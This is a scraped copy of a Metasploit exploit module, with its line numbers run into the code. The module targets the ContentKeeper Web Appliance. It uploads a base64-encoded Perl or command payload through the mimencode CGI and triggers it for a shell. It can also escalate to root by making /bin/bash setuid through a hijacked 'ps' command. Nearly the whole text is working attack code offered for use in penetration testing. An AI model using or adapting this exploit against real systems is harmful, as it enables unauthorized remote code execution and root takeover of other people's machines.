Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/unix/http/contentkeeperweb_mimencode.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'ContentKeeper Web Remote Command Execution',13'Description' => %q{14This module exploits the ContentKeeper Web Appliance. Versions prior15to 125.10 are affected. This module exploits a combination of weaknesses16to enable remote command execution as the Apache user. By setting17SkipEscalation to false, this module will attempt to setuid the bash shell.18},19'Author' => [ 'aushack' ],20'Arch' => [ ARCH_CMD ],21'License' => MSF_LICENSE,22'References' =>23[24[ 'OSVDB', '54551' ],25[ 'OSVDB', '54552' ],26[ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],27],28'Privileged' => false,29'Payload' =>30{31'DisableNops' => true,32'Space' => 1024,33'Compat' =>34{35'PayloadType' => 'cmd',36'RequiredCmd' => 'generic perl telnet',37}38},39'Platform' => ['unix'],40'Targets' =>41[42[ 'Automatic', { } ]43],44'DisclosureDate' => '2009-02-25',45'DefaultTarget' => 0))4647register_options(48[49Opt::RPORT(80),50OptString.new('OVERWRITE', [ true, "The target file to upload our payload (spamkeeper.dat, bak.txt, formdate.pl etc)", 'spamkeeper.dat']),51OptBool.new("SkipEscalation", [true, "Specify this to skip the root escalation attempt", false]),52])53end5455def check56connect57sock.put("GET /cgi-bin/ck/mimencode HTTP/1.0\r\n\r\n")58banner = sock.get_once(-1, 3)59disconnect6061if (banner =~ /500 Internal/)62return Exploit::CheckCode::Vulnerable63end64return Exploit::CheckCode::Safe65end6667def exploit6869exp = "#!/usr/bin/perl\n"70exp << "print \"Content-type: text/html\\n\\n\"\;\n\n"71exp << "use IO::Socket::INET;\n"7273if (datastore['PAYLOAD'] =~ /perl/)74if not datastore['SkipEscalation']75print_status("Attempting to facilitate root escalation...")76exp << %q{ system("echo /bin/chmod u+s /bin/bash > ps; /bin/chmod o+x ps; PATH=.:$PATH; ./benetool stopall;"); } # We can use either 'ps' or 'grep' but ps is fine.77end78exp << payload.encoded.gsub('perl -MIO -e ', '').gsub('\'', '') # We're already inside a perl script!79else80exp << "system(\""81exp << payload.encoded.gsub('"', '\"')82exp << "\");\n"83end8485body = Rex::Text.encode_base64(exp)8687connect8889sploit = "POST /cgi-bin/ck/mimencode?-u+-o+#{datastore['OVERWRITE']} HTTP/1.1\r\n"90sploit << "Host: #{datastore['RHOST']}\r\n"91sploit << "Content-Length: #{body.length}\r\n\r\n"9293print_status("Uploading payload to target...")94sock.put(sploit + body + "\r\n\r\n")95disconnect9697select(nil,nil,nil,3) # Wait a few seconds..98print_status("Calling payload...")99connect100req = "GET /cgi-bin/ck/#{datastore['OVERWRITE']} HTTP/1.1\r\n" # Almost all files are owned by root, chmod'ed 777 :) rwx101req << "Host: #{datastore['RHOST']}\r\n"102sock.put(req + "\r\n\r\n")103104handler105disconnect106select(nil,nil,nil,3) # Wait for session creation.107if not datastore['SkipEscalation'] and session_created? and datastore['PAYLOAD'] =~ /perl/108print_status("Privilege escalation appears to have worked!")109print_status("/bin/bash is now root setuid! Type 'bash -p' to get root.")110print_status("Don't forget to clean up afterwards (chmod -s /bin/bash and restore an original copy of the OVERWRITE file).")111end112113end114end115116117